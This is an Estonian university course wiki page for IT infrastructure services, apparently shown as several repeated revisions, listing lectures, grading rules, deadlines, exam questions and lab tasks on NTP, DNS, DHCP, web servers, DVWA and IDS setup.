Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T09:24:27Z

Mernits: /* Dokumentatsioon */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T09:15:42Z

Mernits: /* Abimaterjal */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

